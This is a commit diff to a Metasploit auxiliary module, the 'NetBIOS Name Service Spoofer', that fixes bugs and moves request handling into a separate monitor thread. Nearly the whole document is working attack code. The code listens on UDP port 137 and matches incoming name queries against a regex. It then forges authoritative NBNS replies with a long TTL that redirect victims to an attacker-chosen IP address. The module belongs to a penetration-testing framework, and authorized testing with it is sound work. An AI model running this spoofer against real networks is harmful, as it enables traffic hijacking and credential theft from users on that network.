Fix a handful of bugs that broke this modules. Fixes #4799
parent
9730a1655e
commit
1b1716bcf6
|
@ -9,6 +9,9 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
include Msf::Exploit::Capture
|
||||
|
||||
attr_accessor :sock, :thread
|
||||
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'NetBIOS Name Service Spoofer',
|
||||
|
@ -44,108 +47,144 @@ class Metasploit3 < Msf::Auxiliary
|
|||
])
|
||||
|
||||
register_advanced_options([
|
||||
OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false])
|
||||
OptBool.new('DEBUG', [ false, "Determines whether incoming packet parsing is displayed", false])
|
||||
])
|
||||
|
||||
deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER')
|
||||
self.thread = nil
|
||||
self.sock = nil
|
||||
end
|
||||
|
||||
def dispatch_request(packet, rhost, src_port)
|
||||
rhost = ::IPAddr.new(rhost)
|
||||
# `recvfrom` (on Linux at least) will give us an ipv6/ipv4 mapped
|
||||
# addr like "::ffff:192.168.0.1" when the interface we're listening
|
||||
# on has an IPv6 address. Convert it to just the v4 addr
|
||||
if rhost.ipv4_mapped?
|
||||
rhost = rhost.native
|
||||
end
|
||||
|
||||
# Convert to string
|
||||
rhost = rhost.to_s
|
||||
|
||||
spoof = ::IPAddr.new(datastore['SPOOFIP'])
|
||||
|
||||
return if packet.length == 0
|
||||
|
||||
nbnsq_transid = packet[0..1]
|
||||
nbnsq_flags = packet[2..3]
|
||||
nbnsq_questions = packet[4..5]
|
||||
nbnsq_answerrr = packet[6..7]
|
||||
nbnsq_authorityrr = packet[8..9]
|
||||
nbnsq_additionalrr = packet[10..11]
|
||||
nbnsq_name = packet[12..45]
|
||||
decoded = ""
|
||||
nbnsq_name.slice(1..-2).each_byte do |c|
|
||||
decoded << "#{(c - 65).to_s(16)}"
|
||||
end
|
||||
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
|
||||
nbnsq_type = packet[46..47]
|
||||
nbnsq_class = packet[48..49]
|
||||
|
||||
return unless nbnsq_decodedname =~ /#{datastore['REGEX']}/i
|
||||
|
||||
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}")
|
||||
|
||||
if datastore['DEBUG']
|
||||
print_status("transid: #{nbnsq_transid.unpack('H4')}")
|
||||
print_status("tlags: #{nbnsq_flags.unpack('B16')}")
|
||||
print_status("questions: #{nbnsq_questions.unpack('n')}")
|
||||
print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
|
||||
print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
|
||||
print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
|
||||
print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
|
||||
print_status("full name: #{nbnsq_name.slice(1..-2)}")
|
||||
print_status("decoded: #{decoded}")
|
||||
print_status("decoded name: #{nbnsq_decodedname}")
|
||||
print_status("type: #{nbnsq_type.unpack('n')}")
|
||||
print_status("class: #{nbnsq_class.unpack('n')}")
|
||||
end
|
||||
|
||||
# time to build a response packet - Oh YEAH!
|
||||
response = nbnsq_transid +
|
||||
"\x85\x00" + # Flags = response + authoratative + recursion desired +
|
||||
"\x00\x00" + # Questions = 0
|
||||
"\x00\x01" + # Answer RRs = 1
|
||||
"\x00\x00" + # Authority RRs = 0
|
||||
"\x00\x00" + # Additional RRs = 0
|
||||
nbnsq_name + # original query name
|
||||
nbnsq_type + # Type = NB ...whatever that means
|
||||
nbnsq_class+ # Class = IN
|
||||
"\x00\x04\x93\xe0" + # TTL = a long ass time
|
||||
"\x00\x06" + # Datalength = 6
|
||||
"\x00\x00" + # Flags B-node, unique = whatever that means
|
||||
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
|
||||
|
||||
pkt = PacketFu::UDPPacket.new
|
||||
pkt.ip_saddr = Rex::Socket.source_address(rhost)
|
||||
pkt.ip_daddr = rhost
|
||||
pkt.ip_ttl = 255
|
||||
pkt.udp_sport = 137
|
||||
pkt.udp_dport = src_port
|
||||
pkt.payload = response
|
||||
pkt.recalc
|
||||
|
||||
capture_sendto(pkt, rhost)
|
||||
end
|
||||
|
||||
def monitor_socket
|
||||
while true
|
||||
rds = [self.sock]
|
||||
wds = []
|
||||
eds = [self.sock]
|
||||
|
||||
r,_,_ = ::IO.select(rds,wds,eds,0.25)
|
||||
if (r != nil and r[0] == self.sock)
|
||||
packet, host, port = self.sock.recvfrom(65535)
|
||||
dispatch_request(packet, host, port)
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
def run
|
||||
check_pcaprub_loaded() # Check first since otherwise this is all for naught
|
||||
# MacOS X workaround
|
||||
::Socket.do_not_reverse_lookup = true
|
||||
check_pcaprub_loaded()
|
||||
::Socket.do_not_reverse_lookup = true # Mac OS X workaround
|
||||
|
||||
@sock = ::UDPSocket.new()
|
||||
@sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
|
||||
@sock.bind('', 137) # couldn't specify srv host because it missed broadcasts
|
||||
# Avoid receiving extraneous traffic on our send socket
|
||||
open_pcap({'FILTER' => 'ether host f0:f0:f0:f0:f0:f0'})
|
||||
|
||||
@run = true
|
||||
self.sock = Rex::Socket.create_udp(
|
||||
'LocalHost' => "0.0.0.0",
|
||||
'LocalPort' => 137,
|
||||
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
|
||||
)
|
||||
add_socket(self.sock)
|
||||
self.sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1)
|
||||
|
||||
print_status("NBNS Spoofer started. Listening for NBNS requests...")
|
||||
|
||||
begin
|
||||
|
||||
while @run # Not exactly thrilled we can never turn this off XXX fix this sometime.
|
||||
packet, addr = @sock.recvfrom(512)
|
||||
src_port = addr[1]
|
||||
rhost = addr[3]
|
||||
|
||||
break if packet.length == 0
|
||||
|
||||
nbnsq_transid = packet[0..1]
|
||||
nbnsq_flags = packet[2..3]
|
||||
nbnsq_questions = packet[4..5]
|
||||
nbnsq_answerrr = packet[6..7]
|
||||
nbnsq_authorityrr = packet[8..9]
|
||||
nbnsq_additionalrr = packet[10..11]
|
||||
nbnsq_name = packet[12..45]
|
||||
decoded = ""
|
||||
nbnsq_name.slice(1..-2).each_byte do |c|
|
||||
decoded << "#{(c - 65).to_s(16)}"
|
||||
self.thread = Rex::ThreadFactory.spawn("NBNSServerMonitor", false) {
|
||||
begin
|
||||
monitor_socket
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception
|
||||
print_error("Error: #{$!.class} #{$!} #{$!.backtrace}")
|
||||
end
|
||||
nbnsq_decodedname = "#{[decoded].pack('H*')}".strip()
|
||||
nbnsq_type = packet[46..47]
|
||||
nbnsq_class = packet[48..49]
|
||||
}
|
||||
|
||||
if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i)
|
||||
print_status("NBNS Spoofer started. Listening for NBNS requests with REGEX \"#{datastore['REGEX']}\" ...")
|
||||
|
||||
vprint_good("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} matches regex, responding with #{datastore["SPOOFIP"]}")
|
||||
|
||||
if datastore['DEBUG']
|
||||
print_status("transid: #{nbnsq_transid.unpack('H4')}")
|
||||
print_status("tlags: #{nbnsq_flags.unpack('B16')}")
|
||||
print_status("questions: #{nbnsq_questions.unpack('n')}")
|
||||
print_status("answerrr: #{nbnsq_answerrr.unpack('n')}")
|
||||
print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}")
|
||||
print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}")
|
||||
print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}")
|
||||
print_status("full name: #{nbnsq_name.slice(1..-2)}")
|
||||
print_status("decoded: #{decoded}")
|
||||
print_status("decoded name: #{nbnsq_decodedname}")
|
||||
print_status("type: #{nbnsq_type.unpack('n')}")
|
||||
print_status("class: #{nbnsq_class.unpack('n')}")
|
||||
end
|
||||
|
||||
# time to build a response packet - Oh YEAH!
|
||||
response = nbnsq_transid +
|
||||
"\x85\x00" + # Flags = response + authoratative + recursion desired +
|
||||
"\x00\x00" + # Questions = 0
|
||||
"\x00\x01" + # Answer RRs = 1
|
||||
"\x00\x00" + # Authority RRs = 0
|
||||
"\x00\x00" + # Additional RRs = 0
|
||||
nbnsq_name + # original query name
|
||||
nbnsq_type + # Type = NB ...whatever that means
|
||||
nbnsq_class+ # Class = IN
|
||||
"\x00\x04\x93\xe0" + # TTL = a long ass time
|
||||
"\x00\x06" + # Datalength = 6
|
||||
"\x00\x00" + # Flags B-node, unique = whet ever that means
|
||||
datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*')
|
||||
|
||||
open_pcap
|
||||
|
||||
p = PacketFu::UDPPacket.new
|
||||
p.ip_saddr = Rex::Socket.source_address(rhost)
|
||||
p.ip_daddr = rhost
|
||||
p.ip_ttl = 255
|
||||
p.udp_sport = 137
|
||||
p.udp_dport = src_port
|
||||
p.payload = response
|
||||
p.recalc
|
||||
|
||||
capture_sendto(p, rhost)
|
||||
|
||||
close_pcap
|
||||
|
||||
else
|
||||
vprint_status("#{rhost.ljust 16} nbns - #{nbnsq_decodedname} did not match regex")
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Exception => e
|
||||
print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}")
|
||||
# Make sure the socket gets closed on exit
|
||||
ensure
|
||||
@sock.close
|
||||
while thread.alive?
|
||||
IO.select(nil, nil, nil, 0.25)
|
||||
end
|
||||
print_status("NBNS Monitor thread exited...")
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if self.thread and self.thread.alive?
|
||||
self.thread.kill
|
||||
self.thread = nil
|
||||
end
|
||||
close_pcap
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue